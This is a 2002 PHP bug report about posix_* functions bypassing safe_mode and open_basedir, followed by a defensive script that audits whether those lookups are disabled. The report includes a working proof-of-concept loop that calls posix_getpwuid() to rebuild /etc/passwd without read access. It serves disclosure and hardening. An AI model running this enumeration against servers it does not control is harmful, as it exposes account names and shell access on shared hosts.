 ID:               16733
 Updated by:       [EMAIL PROTECTED]
 Reported By:      [EMAIL PROTECTED]
-Status:           Open
+Status:           Analyzed
 Bug Type:         *General Issues
 Operating System: Unix
 PHP Version:      4.2.0
 New Comment:

Hmm. I was under the impression ext/posix is disabled for non-CLI SAPIs.
Checking this out.

Previous Comments:
------------------------------------------------------------------------

[2002-04-22 12:53:42] [EMAIL PROTECTED]

I noticed that many of the posix_* functions DO NOT check whether
safe_mode or open_basedir restrict access to the user database, thus
allowing a user to rebuild a complete /etc/passwd without permissions to
read /etc/passwd or access the /etc directory.

This is dangerous in some cases where logins are kept secret, as it allows
a user to know what accounts have what privileges and what accounts have
access to a shell or not.

For now there is only one thing to do, disable these functions, but I'm
pretty sure that adding checks to see values of safe_mode and/or
open_basedir would be a nice thing to do.

Here's a script that rebuilds /etc/passwd when safe_mode is enabled and
open_basedir is set to the user's home directory:

<?php
// Walk the uid range; posix_getpwuid() answers even though safe_mode and
// open_basedir deny direct access to /etc/passwd.
for ($i = 0; $i < 60000; $i++)
{
    // Unknown uids return false; @ suppresses the warning.
    if (($tab = @posix_getpwuid($i)) != NULL)
    {
        // Print the fields in /etc/passwd order.
        echo $tab['name'].":";
        echo $tab['passwd'].":";
        echo $tab['uid'].":";
        echo $tab['gid'].":";
        echo $tab['gecos'].":";
        echo $tab['dir'].":";
        echo $tab['shell']."<br>";
    }
}
?>

On a very large system, if an execution time is set, this will not end
up, but hopefully the posix_getpwent() function is missing so the user
has to go through all possible uid's.

------------------------------------------------------------------------

--
Edit this bug report at http://bugs.php.net/?id=16733&edit=1
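
The workaround named in the report (disabling the functions) can be verified from inside PHP itself. The script below is an added example, not part of the bug report or of PHP's own code; the helper name audit_posix_lookups and the list of four lookup functions are assumptions, since the report only shows posix_getpwuid().

```php
<?php
// Added example: audit whether the user/group database lookups are callable.
// Assumption: this list of functions; the report only shows posix_getpwuid().
const POSIX_LOOKUPS = ['posix_getpwuid', 'posix_getpwnam', 'posix_getgrgid', 'posix_getgrnam'];

/**
 * Classify each lookup function as "disabled", "absent" or "callable".
 * $disableIni is the raw disable_functions value; $exists can be injected
 * so the logic can be exercised without changing php.ini.
 */
function audit_posix_lookups(string $disableIni, ?callable $exists = null): array
{
    $exists = $exists ?? 'function_exists';
    // disable_functions is a comma-separated list of function names.
    $disabled = array_filter(array_map(
        static fn($name) => strtolower(trim($name)),
        explode(',', $disableIni)
    ));
    $report = [];
    foreach (POSIX_LOOKUPS as $fn) {
        if (in_array($fn, $disabled, true)) {
            $report[$fn] = 'disabled';   // blocked by disable_functions
        } elseif (!$exists($fn)) {
            $report[$fn] = 'absent';     // ext/posix not available in this SAPI
        } else {
            $report[$fn] = 'callable';   // user scripts can enumerate accounts
        }
    }
    return $report;
}

// Constructed sample: only posix_getpwuid disabled, extension present.
$sample = audit_posix_lookups('exec, posix_getpwuid', static fn($f) => true);
foreach ($sample as $fn => $state) {
    printf("sample  %-16s %s\n", $fn, $state);
}

// Live check against the configuration this script is running under.
$live = audit_posix_lookups((string) ini_get('disable_functions'));
foreach ($live as $fn => $state) {
    printf("live    %-16s %s\n", $fn, $state);
}

// Non-zero exit status when any lookup is still reachable.
exit(in_array('callable', $live, true) ? 1 : 0);
```

Run it through the same SAPI and php.ini that serve user scripts, since the CLI binary may load a different configuration. In the constructed sample, posix_getpwnam, posix_getgrgid and posix_getgrnam still report as callable, which shows that disabling only the function used in the report leaves the other lookups open.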